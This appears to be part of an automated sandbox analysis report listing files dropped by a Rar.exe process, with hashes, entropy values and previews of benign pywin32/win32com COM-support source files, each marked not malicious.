                                                                                                                                                                                      Preview:#ifndef __PYTHONCOMSERVER_H__.#define __PYTHONCOMSERVER_H__..// PythonCOMServer.h :Server side COM support..#include <Python.h>..#define DLLAcquireGlobalLock PyWin_AcquireGlobalLock.#define DLLReleaseGlobalLock PyWin_ReleaseGlobalLock..void PYCOM_EXPORT PyCom_DLLAddRef(void);.void PYCOM_EXPORT PyCom_DLLReleaseRef(void);..// Use this macro at the start of all gateway methods..#define PY_GATEWAY_METHOD CEnterLeavePython _celp..class PyGatewayBase;.// Gateway constructors..// Each gateway must be able to be created from a "gateway constructor". This.// is simply a function that takes a Python instance as as argument, and returns.// a gateway object of the correct type. The MAKE_PYGATEWAY_CTOR is a helper that.// will embed such a constructor in the class - however, this is not necessary -.// _any_ function of the correct signature can be used...typedef HRESULT (*pfnPyGatewayConstructor)(PyObject *PythonInstance, PyGatewayBase *, void **ppResult, REFIID iid);.HRESULT PyCom_MakeRegistered
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:current ar archive
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):70698
                                                                                                                                                                                      Entropy (8bit):5.414650454855484
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:B3Ct2UYJ28RE+7XFdaU8us+ASqaykDvZlbeXQUDYHBWkathYEnKp9l90ncY9P+Z+:B3Ct2UYJ2eAnKp9l9ngprsl+7
                                                                                                                                                                                      MD5:E368160E8FD3E04AE678523D8732EDD9
                                                                                                                                                                                      SHA1:1629D1298D21988B46ADEF5E971C85E8E25247EE
                                                                                                                                                                                      SHA-256:E51D6CAAF41056327177FC03DC6C5BFBDC82E4A52B64FC87424CF70D16B8F694
                                                                                                                                                                                      SHA-512:69BBD6AAC1008A035D8287D614B35C83F2424ED885D2FA3438602BE70246CFCFD654B4792F069F4B87BD40EB0F234C4F23C095B762036DF3420429C0DA78E3F8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:!<arch>./ -1 0 20695 `....i...~...................~.......&..........n.......N...t.............t...........n......."...............t.......V......L...R...R...................>...>...........:...:...........l...l..."..."...H...H.................................b...b...h...h...................................>...>...x...x...6...6...........................D...D...................|...|...Z...Z...........0...0...|...|...4...4...................0...0...b...b...........................b...b...........P...P................................."..."...........X...X...(...(.................................................J...J...........................<...<...2...2.........................................~...~...8...8...J...J...........r...r...................................Z...Z...........p...p...................n...n...........4...4.......................N...N...l...l.................x...x.........J...J...v...v.................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:current ar archive
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):155736
                                                                                                                                                                                      Entropy (8bit):5.470470467759092
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:vt3gJ+MUw37r5vRE752vdPoDYwaYrT6oY0RsRSdQbM8:vt3gN37r5vi75WPoDYwJ6oY0RsRSST
                                                                                                                                                                                      MD5:1E4E50A3C3EEC56A92D99859BC343A83
                                                                                                                                                                                      SHA1:7B80F0508B27C217677A5B1DECA27FE5450BBA40
                                                                                                                                                                                      SHA-256:DE8920C24121076DCC77753A536B40BDAB9D96A4EF8D71DFF42F2DDD284AA266
                                                                                                                                                                                      SHA-512:4BE95CE619EE395D57F2B27F172A809E60914C14122D1BCC9930E6ADB36A86D38FE4A33FC1582BB4EA9D572959E34D1BFAC102186E53FD53351CA68875583487
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:!<arch>./ -1 0 44603 `....Y..]...`...aj...........b...b...................d...d.........................._..._........X.......@...4...............R...8...f......."..."...........T...T...........>...>...................6...6...Z...Z...........................................$...$..........................n...n...=...=...................m...m...=V..=V... ... ...........P...P..)...)...........}J..}J..(...(....f...f..~N..~N..)L..)L..........y...y...&...&....R...R..z...z...&...&...........l...l....~...~..........p...p...>...>...!...!....(...(..o...o... t.. t...h...h...P...P..*...*............................p...p...........|...|...........x...x..........j...j...N$..N$..M...M...FT..FT...b...b...................<...<...........8...8...x...x..0...1...10..0"..-...-...+...+....................J...J...<...<..K...K...c...c...M...M...Lz..Lz..d...d...J...J....@...@..e`..e`...........6...(...(...........p...p...................Z...Z..+...+...,...,.........
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30
                                                                                                                                                                                      Entropy (8bit):3.973557262275185
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SK2h+FVjWSvn:SzIvjjv
                                                                                                                                                                                      MD5:BA42EF20D93BA7415413FCD3F21EFB55
                                                                                                                                                                                      SHA1:B0D0EEDAE009426C2BC525FC560FE6572416A97F
                                                                                                                                                                                      SHA-256:FD88250292E1A51D97B335ECF6806D3A0C52680A941F9DE21FFB6B9E82C976EB
                                                                                                                                                                                      SHA-512:5FE595FD307943BD9EC09CA78A4DC07055C0B131B5A030C900936904FE70219FD1E0614588265A42838063E5AF5C9FA9A4A4D8B7F97C48BEF8C9A52EDC72C5DC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# indicates a python package..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C++ source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20176
                                                                                                                                                                                      Entropy (8bit):4.575209015581771
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:twHXSHGNtJKREawSP8m86dZUmhPJ9nV1oHuT42MilRQt1dK+EsfVPm6TrwEFSSMF:t8NtOEawSP8P6dZUmhCKbsfVPTkNKy/
                                                                                                                                                                                      MD5:5D2E6FFF9BD431CF49C8D3275299FD80
                                                                                                                                                                                      SHA1:B69B8E2B7D56919EA1D21A454A98D6A365192FB9
                                                                                                                                                                                      SHA-256:C499367F47853D6A4178BFC35170EAF95CCF6623F5139F01ACC55E381FE70CC2
                                                                                                                                                                                      SHA-512:19A70A1A640428152EE8A0BF4E0E5D8D4432E41517FEB59BE6F3A69C95C2B3FDF4DC631904D3D913CF237C397C24EDEC505D07EEE1C9377D094F71AB646C33FA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utility functions for writing out gateway C++ files.. This module will generate a C++/Python binding for a specific COM. interface.. . At this stage, no command line interface exists. You must start Python, . import this module, change to the directory where the generated code should. be written, and run the public function.. . This module is capable of generating both 'Interfaces' (ie, Python. client side support for the interface) and 'Gateways' (ie, Python. server side support for the interface). Many COM interfaces are useful. both as Client and Server. Other interfaces, however, really only make. sense to implement one side or the other. For example, it would be pointless. for Python to implement Server side for 'IRunningObjectTable', unless we were. implementing core COM for an operating system in Python (hey - now there's an idea!). . Most COM interface code is totally boiler-plate - it consists of. converting arguments, dispatching the call to Python, a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9847
                                                                                                                                                                                      Entropy (8bit):5.399405890181776
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:EcpyojruGhiAqTPQPkAqXjXhXqLXZXp2X2VXeZAXyb4tsZI:3z/uGcAuAqzRuJ5286AXyb4EI
                                                                                                                                                                                      MD5:9CCF0CA7E709CD2E6B5D476F378DEF95
                                                                                                                                                                                      SHA1:34A01A55208EB7B3395F3BBF2800DDBE07674BE5
                                                                                                                                                                                      SHA-256:E949A4B0C3930B22EB01C0D35BA192360FEEE6EB36D27ACBBE03B8B804FC025F
                                                                                                                                                                                      SHA-512:CF762EBE591CB41808A06D607C7BCB8FB084CD249634633D3D35482E9E8BEEA9C0EB27E8265E4A6B5BA424862AADF550A94F61E1031AE5821D5BA0D3C77B7FB3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utility file for generating PyIEnum support...This is almost a 'template' file. It simplay contains almost full.C++ source code for PyIEnum* support, and the Python code simply.substitutes the appropriate interface name...This module is notmally not used directly - the @makegw@ module.automatically calls this..""".#.# INTERNAL FUNCTIONS.#.#.import string...def is_interface_enum(enumtype):. return not (enumtype[0] in string.uppercase and enumtype[2] in string.uppercase)...def _write_enumifc_cpp(f, interface):. enumtype = interface.name[5:]. if is_interface_enum(enumtype):. # Assume an interface.. enum_interface = "I" + enumtype[:-1]. converter = (. "PyObject *ob = PyCom_PyObjectFromIUnknown(rgVar[i], IID_%(enum_interface)s, FALSE);". % locals(). ). arraydeclare = (. "%(enum_interface)s **rgVar = new %(enum_interface)s *[celt];" % locals(). ). else:. # Enum of a simple structure. conv
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34854
                                                                                                                                                                                      Entropy (8bit):4.80766491378114
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:BYm6rknUQcV8SzdUmeibJWcPC8XGqM3jZD9O18Y6OMJlj:vpqOV9OS
                                                                                                                                                                                      MD5:46A0AD8E52F6DAB936F214B2CF90C61C
                                                                                                                                                                                      SHA1:2F86C72EE3FFD7E5513A8985FE1D94A293BDA47F
                                                                                                                                                                                      SHA-256:283844A35361A2DCE5B671A8D66DF111DF67049B3E023E22FD332A67254D7DEF
                                                                                                                                                                                      SHA-512:2C0889EA767642F9240BC631B24E3E68FE5A03C0B969F1140A0555E74838ED5C69F839BE9DD644518008EC71C2C85AA0D1DE10D30ED0748B31C8F8F58896C0E0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities for makegw - Parse a header file to build an interface.. This module contains the core code for parsing a header file describing a. COM interface, and building it into an "Interface" structure... Each Interface has methods, and each method has arguments... Each argument knows how to use Py_BuildValue or Py_ParseTuple to. exchange itself with Python.. . See the @win32com.makegw@ module for information in building a COM. interface.""".import re.import traceback...class error_not_found(Exception):. def __init__(self, msg="The requested item could not be found"):. super(error_not_found, self).__init__(msg)...class error_not_supported(Exception):. def __init__(self, msg="The required functionality is not supported"):. super(error_not_supported, self).__init__(msg)...VERBOSE = 0.DEBUG = 0..## NOTE : For interfaces as params to work correctly, you must.## make sure any PythonCOM extensions which expose the interface are loaded.## before generating....class Arg
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2626
                                                                                                                                                                                      Entropy (8bit):4.935656889264299
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:u5riPyEAcqbTwJUek5K6FDHv7URlY3JQKh:mriPyEATbIUn5K8DP7slY3Jh
                                                                                                                                                                                      MD5:68696E6FE76DE40C39CB9DCB0D0A5385
                                                                                                                                                                                      SHA1:64DB43664DD46D3E0CA40D845FE4FF4C9B2E1EA3
                                                                                                                                                                                      SHA-256:EC5013D1FB45A684992BAECEB53DC602F8A6CA88E90B0500D8395244B1D85AAC
                                                                                                                                                                                      SHA-512:A0639C8B37FAA246D4F67B3670314694D2963474A24FC1DEF0EB87AF66F6E8A61816A18EE9319A73B8EE8B4D61B58024C7750D3D2F840F3603C91A810B5A1982
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Constants used by COM Controls.. Hand created version of OLECTL.H constants.."""..import winerror..FACILITY_CONTROL = 0xA...def MAKE_SCODE(sev, fac, code):. return int((int(-sev) << 31) | ((fac) << 16) | ((code)))...def STD_CTL_SCODE(n):. return MAKE_SCODE(winerror.SEVERITY_ERROR, FACILITY_CONTROL, n)...CTL_E_ILLEGALFUNCTIONCALL = STD_CTL_SCODE(5).CTL_E_OVERFLOW = STD_CTL_SCODE(6).CTL_E_OUTOFMEMORY = STD_CTL_SCODE(7).CTL_E_DIVISIONBYZERO = STD_CTL_SCODE(11).CTL_E_OUTOFSTRINGSPACE = STD_CTL_SCODE(14).CTL_E_OUTOFSTACKSPACE = STD_CTL_SCODE(28).CTL_E_BADFILENAMEORNUMBER = STD_CTL_SCODE(52).CTL_E_FILENOTFOUND = STD_CTL_SCODE(53).CTL_E_BADFILEMODE = STD_CTL_SCODE(54).CTL_E_FILEALREADYOPEN = STD_CTL_SCODE(55).CTL_E_DEVICEIOERROR = STD_CTL_SCODE(57).CTL_E_FILEALREADYEXISTS = STD_CTL_SCODE(58).CTL_E_BADRECORDLENGTH = STD_CTL_SCODE(59).CTL_E_DISKFULL = STD_CTL_SCODE(61).CTL_E_BADRECORDNUMBER = STD_CTL_SCODE(63).CTL_E_BADFILENAME = STD_CTL_SCODE(64).CTL_E_TOOMANYFILES = STD_CTL_SCODE(67
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3719
                                                                                                                                                                                      Entropy (8bit):4.868092224015867
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:PASMD/23erRuX5WMbTA9AoOeXvOkmZM7ThZfDZ3I9aQ:P46+ITAgWmW7lZf2R
                                                                                                                                                                                      MD5:9526997CC08298A2385B3AB78BC198C3
                                                                                                                                                                                      SHA1:230227292D5DE2BC0D73188A010EC44A6E84BBAD
                                                                                                                                                                                      SHA-256:605AF9EA17CE0A2AA2F88E9A750B5F2B6809F6A4D2C19C05ABB657650CF772F6
                                                                                                                                                                                      SHA-512:2766F2D414681646281B5343DE2F035918D2C462011D3193BBF3ECC7F8DC496123545FA9D11A9337811481711470573DCFA7CF809FEF8AC63F744DE501C56B3B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html lang="en">.<head>. <title>win32com Readme</title>.</head>.<body>. .<p><img width="551" height="99" id="_x0000_i1025". src="html%5Cimage%5Cpycom_blowing.gif". alt="Python and COM - Blowing the others away"> </p>. .<h1>Python COM Extensions Readme </h1>. .<p>This is the readme for win32com. Please check out the <a. href="html/docindex.html">win32com documentation index</a></p>. .<p>The <a href="test/.">win32com/test directory</a> contains some interesting. scripts (and a new <a href="test/readme.txt">readme.txt</a>). Although these. are used for testing, they do show a variety of COM techniques.</p>..<h3>VARIANT objects</h3>.<p>win32com.client now has explicit VARIANT objects which can be used in.situations where you need more control over the argument types passed when.calling COM methods. See the <a href="html/variant.html">documentation on.this object</a>..<a name="currency"><h3>Important Currency changes</h3></a>.<p>.In all builds prior to 204, a COM
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):50
                                                                                                                                                                                      Entropy (8bit):4.29082650068666
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SN7cF55IbMCwmF37Uuvn:SNwCwy37Uuv
                                                                                                                                                                                      MD5:82A4AC7481C3360B6A75C3EC790E0B2F
                                                                                                                                                                                      SHA1:43DFD78709CFC4F5120F5409A1159170007CD5DD
                                                                                                                                                                                      SHA-256:5837731C114E3B7C978F01D6230282A5A85EB16B6CB085882535518C2B58A0BB
                                                                                                                                                                                      SHA-512:4516B83B661F587899B7D269FB815C3D4F84037F105830EEB44F3E52461DAF2E7F05ABBA1E33B4C20CAC655E2729B3409FC90072066166646788A4D82857CDBE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Empty __init__ file to designate a sub-package..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2780
                                                                                                                                                                                      Entropy (8bit):4.553893776894134
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:plZbTZ+1Xlh4ltllXlD/PDlIeXlhdXlKSXlYXlmgxDXlZlLjEEG/J1S5CJ8lXlaC:pHZElCltl9lTLlfljlKslSlmghlZlENQ
                                                                                                                                                                                      MD5:396562952093B33EA5240C8BC6E0FFC8
                                                                                                                                                                                      SHA1:BDB107892B56BF58C3A2993F4719786789A7627F
                                                                                                                                                                                      SHA-256:9C7EC4B7878A83182038EAA856F3EA2F8C405F6FD5DF8F8CF63AA0566CFF2D8E
                                                                                                                                                                                      SHA-512:879AF1EC5FEEC33B9502AF7319F56B85D101FB29F315443D2C17B92607A3A590CA7A689FB3576F30B8C8905AA3ABA75EB1A5C90910400FAD534D9DF083F157AA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities for Server Side connections... A collection of helpers for server side connection points..""".import pythoncom.import win32com.server.util.import winerror.from win32com import olectl..from .exception import Exception..# Methods implemented by the interfaces..IConnectionPointContainer_methods = ["EnumConnectionPoints", "FindConnectionPoint"].IConnectionPoint_methods = [. "EnumConnections",. "Unadvise",. "Advise",. "GetConnectionPointContainer",. "GetConnectionInterface",.]...class ConnectableServer:. _public_methods_ = IConnectionPointContainer_methods + IConnectionPoint_methods. _com_interfaces_ = [. pythoncom.IID_IConnectionPoint,. pythoncom.IID_IConnectionPointContainer,. ].. # Clients must set _connect_interfaces_ = [...]. def __init__(self):. self.cookieNo = 0. self.connections = {}.. # IConnectionPoint interfaces. def EnumConnections(self):. raise Exception(winerror.E_NOTIMPL).. def GetConnecti
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9975
                                                                                                                                                                                      Entropy (8bit):4.595107747090245
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:4i9MMxb7wjBfGujx6rMAwOw6gjRm5OMBjfydYR5hjnf:4i99xRodJ6Lf
                                                                                                                                                                                      MD5:96AD74AB698B539ED8116C23BB65DCB9
                                                                                                                                                                                      SHA1:4841F432849C161B8F7D82B7FA419EA6815EB956
                                                                                                                                                                                      SHA-256:9407FD5B735C360346663A5D84E214D49867A71FBC7FC8981C3295BA630C0D9F
                                                                                                                                                                                      SHA-512:CBCA45D7AFDEB60590C9DBC6690BAD76B06079ACBBB3331612A735D350E4455177B92EA79CFF8E4D738CD35849B3C1B125B2B2FD1CB60BCDA4B748F42D8E67AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Dispatcher..Please see policy.py for a discussion on dispatchers and policies.""".import traceback.from sys import exc_info..import pythoncom.import win32api.import win32com..#.from win32com.server.exception import IsCOMServerException.from win32com.util import IIDToInterfaceName...class DispatcherBase:. """The base class for all Dispatchers... This dispatcher supports wrapping all operations in exception handlers,. and all the necessary delegation to the policy... This base class supports the printing of "unexpected" exceptions. Note, however,. that exactly where the output of print goes may not be useful! A derived class may. provide additional semantics for this.. """.. def __init__(self, policyClass, object):. self.policy = policyClass(object). # The logger we should dump to. If None, we should send to the. # default location (typically 'print'). self.logger = getattr(win32com, "logger", None).. # Note the "return self._H
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3496
                                                                                                                                                                                      Entropy (8bit):4.582156737415511
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Y++AYcGgH1ErYMx+bwFvIZBWuDs+IS7INXN87n:Y++RcGEErYMx+bw5IZBpAtdQn
                                                                                                                                                                                      MD5:2D6CEA590F0A95EA2A0DB27A216F4195
                                                                                                                                                                                      SHA1:0C7EEEE558751176B574B8CD278D00B6AEC61C3A
                                                                                                                                                                                      SHA-256:14F17FE2B55FDC8D3B8362F975DC24888585B9ADE97D92F458EA2BB9CDB9A38B
                                                                                                                                                                                      SHA-512:0578DF531158C75AC232329773245342E0D27CA5F8E4EBC3F6C1A77E214A7BF04DC0FF1DFB78ACC1C910C351F0F04AB668F45268E30BAD3300975B3C735912CC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Exception Handling.. Exceptions... To better support COM exceptions, the framework allows for an instance to be.. raised. This instance may have a certain number of known attributes, which are.. translated into COM exception details..... This means, for example, that Python could raise a COM exception that includes details.. on a Help file and location, and a description for the user..... This module provides a class which provides the necessary attributes...""".import sys..import pythoncom...# Note that we derive from com_error, which derives from exceptions.Exception.# Also note that we dont support "self.args", as we dont support tuple-unpacking.class COMException(pythoncom.com_error):. """An Exception object that is understood by the framework... If the framework is presented with an exception of type class,. it looks for certain known attributes on this class to provide rich. error information to the caller... It should be noted that the framework supports provi
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):850
                                                                                                                                                                                      Entropy (8bit):4.815862014888664
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:/QNX5gdGqRokVs8c86r5VrIgyXDe+5trM:IF5gpRoOOrjrHEDxtrM
                                                                                                                                                                                      MD5:5683E97DCD5F29A47F276FA99CDF7B3D
                                                                                                                                                                                      SHA1:818F22170F5F2EF06D3E9E25B116640988AC780E
                                                                                                                                                                                      SHA-256:921B1941F622F5C5A5D7C6189F4886A4CF6D95771AC0908BCAC72A36CFAEF9E1
                                                                                                                                                                                      SHA-512:CF477E6DDA4BB34FB1ED41D3B107EFAF43450FC3CC836910CC4F517F86A099572E44D3B23D8507337D12368C3910147948785E7AABCEC8ADFA50BFA540F2FE00
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Class factory utilities..import pythoncom...def RegisterClassFactories(clsids, flags=None, clsctx=None):. """Given a list of CLSID, create and register class factories... Returns a list, which should be passed to RevokeClassFactories. """. if flags is None:. flags = pythoncom.REGCLS_MULTIPLEUSE | pythoncom.REGCLS_SUSPENDED. if clsctx is None:. clsctx = pythoncom.CLSCTX_LOCAL_SERVER. ret = []. for clsid in clsids:. # Some server append '-Embedding' etc. if clsid[0] not in ["-", "/"]:. factory = pythoncom.MakePyFactory(clsid). regId = pythoncom.CoRegisterClassObject(clsid, factory, clsctx, flags). ret.append((factory, regId)). return ret...def RevokeClassFactories(infos):. for factory, revokeId in infos:. pythoncom.CoRevokeClassObject(revokeId).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1194
                                                                                                                                                                                      Entropy (8bit):4.976463880953823
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:qEDDboYs/8GX9lwQGZLTqtxU8R76HPMX5h48yaaI12pFu2aBpNC:6ZXzwNZCtGU76vW5h/H2pFuri
                                                                                                                                                                                      MD5:01E7B6FDA3635ABB6DAEEE50CDEED9F7
                                                                                                                                                                                      SHA1:E41B28638F8A3EECB8D55F89EF9EA02A724CCED1
                                                                                                                                                                                      SHA-256:EA66C96F055172DE3900929BF21D25CF9A97B207D5009AAF164BB6E7F6BAD10E
                                                                                                                                                                                      SHA-512:62E01CAF0ADC3DF9CCCD45AE56A653B1DCAF5C8767BFDB8C81199DFBB8DAA83B19A78AC0F20D8D88B82CE947E2125DADDADDF46E8F83858A4A94736F4EEC9780
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# LocalServer .EXE support for Python..#.# This is designed to be used as a _script_ file by pythonw.exe.#.# In some cases, you could also use Python.exe, which will create.# a console window useful for debugging..#.# NOTE: When NOT running in any sort of debugging mode,.# 'print' statements may fail, as sys.stdout is not valid!!!..#.# Usage:.# wpython.exe LocalServer.py clsid [, clsid].import sys..sys.coinit_flags = 2.import pythoncom.import win32api.from win32com.server import factory..usage = """\.Invalid command line arguments..This program provides LocalServer COM support.for Python COM objects...It is typically run automatically by COM, passing as arguments.The ProgID or CLSID of the Python Server(s) to be hosted."""...def serve(clsids):. infos = factory.RegisterClassFactories(clsids).. pythoncom.EnableQuitMessage(win32api.GetCurrentThreadId()). pythoncom.CoResumeClassObjects().. pythoncom.PumpMessages().. factory.RevokeClassFactories(infos).. pythoncom.CoUnini
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33141
                                                                                                                                                                                      Entropy (8bit):4.593543235743787
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:J5/q7N12KNQZlYN0wyC+NIW59VEERVLdrW0o2nBiUtv4xVCiDc:J5/qpkKulI+jW0o+vv4/o
                                                                                                                                                                                      MD5:639A66364D8B6CA5B7E57BCAA86107CD
                                                                                                                                                                                      SHA1:0961CA6A02895FEA1DB40C5B4EE82EE8EE90075F
                                                                                                                                                                                      SHA-256:9978C536B37B9F73512A91D0E3FC99F55D1FED91FAFCB17AFA68E9F2BC5744E9
                                                                                                                                                                                      SHA-512:E72F03CECD540C6006DA8CEFA4896709FB2F13AFD5CC9C492511725939974D6D21E7C9E74B0C7386DDE08114D24E05ABD72F166B5DF8C3EBE367CAD021AD820D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Policies ..Note that Dispatchers are now implemented in "dispatcher.py", but.are still documented here...Policies.. A policy is an object which manages the interaction between a public . Python object, and COM . In simple terms, the policy object is the . object which is actually called by COM, and it invokes the requested . method, fetches/sets the requested property, etc. See the . @win32com.server.policy.CreateInstance@ method for a description of. how a policy is specified or created... Exactly how a policy determines which underlying object method/property . is obtained is up to the policy. A few policies are provided, but you . can build your own. See each policy class for a description of how it . implements its policy... There is a policy that allows the object to specify exactly which . methods and properties will be exposed. There is also a policy that . will dynamically expose all Python methods and properties - even those . added after the object has been instantiat
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):25076
                                                                                                                                                                                      Entropy (8bit):4.659547425005804
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:7NT/CaIamuUGpr4ou56hqhmVyVqaxu+HgDFXwx/D9kkUkPl:7NT/GGpK5iqkVyV/xDupw9D9GkPl
                                                                                                                                                                                      MD5:DC199C2F6BB9103A9D81A4FA4E90DF3D
                                                                                                                                                                                      SHA1:B9741C7736A308334AEFE4AE425E298E99494AAE
                                                                                                                                                                                      SHA-256:8D20A25015E4BC54CBFEEC727BFFD53D864D44FCB884C6B03BE6BEA247744AF5
                                                                                                                                                                                      SHA-512:33328D661889C48B2767C400C31013402DED7D57B5C8F1FAA17C3BFF7EA2EA7024DFF0D1DFAEF6A124AB9FAA5A342805B880219BF6EA597A48C58A2221DB43F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
